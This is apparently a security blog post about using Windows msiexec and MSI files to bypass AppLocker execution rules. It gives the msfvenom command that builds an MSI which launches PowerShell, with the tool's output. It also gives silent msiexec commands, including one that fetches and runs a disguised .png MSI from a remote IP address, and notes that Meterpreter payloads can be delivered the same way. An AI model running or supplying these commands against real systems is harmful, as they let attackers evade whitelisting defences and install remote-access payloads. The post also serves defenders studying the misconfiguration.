MSIEXEC is a Microsoft utility that can be used to install or configure a product from the command line. If an environment is not configured properly the use of .MSI files can allow an attacker either to perform privilege escalation or to bypass AppLocker rules. The following post demonstrates that systems that are configured not to block execution of MSI files for all users are not properly protected as any AppLocker executable rule can be bypassed easily.

Metasploit MsfVenom can be used in order to generate .MSI files that will execute a command or a payload.

msfvenom -f msi -p windows/exec CMD=powershell.exe > powershell.msi
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 199 bytes
Final size of msi file: 159744 bytes
MsfVenom - Generating MSI Files

MsfVenom – Generating MSI Files

Execution of powershell.msi will open a PowerShell session bypassing the AppLocker rule that deny the use of PowerShell for all users.

MSIEXEC - PowerShell

MSIEXEC – PowerShell

It is also possible to run the command below either from a command prompt or if it is blocked through Windows Run.

msiexec /quiet /i cmd.msi
MSIEXEC via Run

MSIEXEC via Run

The command prompt will open.

msiexec - Command Prompt

MSIEXEC – Command Prompt

Alternatively msiexec utility has the ability to run MSI files that have been renamed to PNG. These files can be executed either locally or remotely from a command prompt or from Windows Run bypassing AppLocker rules.

msiexec /q /i http://192.168.100.3/tmp/cmd.png
msiexec - Command Prompt via PNG

MSIEXEC – Command Prompt via PNG

The same concept applies and for MSI files that contain Meterpreter payloads.

MSI - Meterpreter Payload

MSI – Meterpreter Payload

MSIEXEC - Meterpreter

MSIEXEC – Meterpreter

Advertisements